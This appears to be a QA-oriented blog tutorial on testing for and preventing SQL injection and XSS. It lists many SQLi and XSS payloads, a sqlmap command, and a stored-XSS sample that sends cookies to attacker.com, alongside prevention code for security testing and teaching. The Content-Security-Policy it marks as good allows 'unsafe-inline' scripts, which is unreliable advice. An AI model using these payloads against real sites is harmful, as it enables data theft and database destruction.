SQL Injection and XSS: Finding Vulnerabilities

SQL (as discussed in OWASP ZAP Automation: Security Scanning in CI/CD) Injection and Cross-Site Scripting (XSS) remain among the most critical web application vulnerabilities. Understanding how to detect, test, and prevent these attacks is essential for QA professionals working on security (as discussed in Penetration Testing Basics for QA Testers) testing.

SQL Injection

Types of SQL Injection

1. Classic SQL Injection

-- Vulnerable code
SELECT * FROM users WHERE username = '$username' AND password = '$password'

-- Attack payload
username: admin' OR '1'='1
password: anything

-- Resulting query
SELECT * FROM users WHERE username = 'admin' OR '1'='1' AND password = 'anything'

2. Blind SQL Injection

-- Time-based blind injection
admin' AND SLEEP(5)--

-- Boolean-based blind injection
admin' AND 1=1--  (true condition)
admin' AND 1=2--  (false condition)

3. Union-Based Injection

-- Extract data from other tables
' UNION SELECT username, password FROM admin_users--

Testing for SQL Injection

Manual Testing Payloads:

' OR '1'='1
'; DROP TABLE users; --
' UNION SELECT NULL, NULL, NULL--
admin'--
' OR 1=1--

Automated Testing:

# SQLMap
sqlmap -u "http://example.com/login" --data="username=test&password=test" --batch

# OWASP (as discussed in [Security Testing for QA: A Practical Guide](/blog/security-testing-for-qa)) ZAP
zap-cli quick-scan http://example.com

Prevention

# Bad: String concatenation
query = f"SELECT * FROM users WHERE id = {user_id}"

# Good: Parameterized queries
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))

# Good: ORM usage
user = User.objects.get(id=user_id)

Cross-Site Scripting (XSS)

Types of XSS

1. Reflected XSS

// URL: http://example.com/search?q=<script>alert('XSS')</script>

// Vulnerable code
<div>Search results for: <?php echo $_GET['q']; ?></div>

2. Stored XSS

// Malicious comment stored in database
<script>
  fetch('http://attacker.com/steal?cookie=' + document.cookie)
</script>

3. DOM-Based XSS

// Vulnerable code
document.getElementById('output').innerHTML = location.hash.substr(1);

// Attack URL
http://example.com/#<img src=x onerror=alert('XSS')>

Testing for XSS

Basic Payloads:

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg/onload=alert('XSS')>
<iframe src="javascript:alert('XSS')">

Advanced Payloads:

// Bypass filters
<ScRiPt>alert('XSS')</ScRiPt>
<img src="x" onerror="eval(atob('YWxlcnQoJ1hTUycp'))">

// Event handlers
<div onmouseover="alert('XSS')">Hover me</div>
<body onload=alert('XSS')>

XSS Prevention

// Bad: Direct HTML insertion
element.innerHTML = userInput;

// Good: Text content
element.textContent = userInput;

// Good: Escaping
function escapeHtml(text) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#039;'
  };
  return text.replace(/[&<>"']/g, m => map[m]);
}

// Good: Content Security Policy
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'

Testing Tools

Tool	Type	Best For
SQLMap	SQL Injection	Automated SQLi detection
Burp Suite	Manual Testing	Intercepting and modifying requests
OWASP ZAP	Automated Scanner	General vulnerability scanning
XSStrike	XSS Testing	Advanced XSS detection
Acunetix	Commercial	Comprehensive scanning

Conclusion

SQL Injection and XSS remain critical vulnerabilities that QA teams must actively test for. Use combination of manual and automated testing, implement proper input validation and output encoding, and continuously monitor for new attack vectors.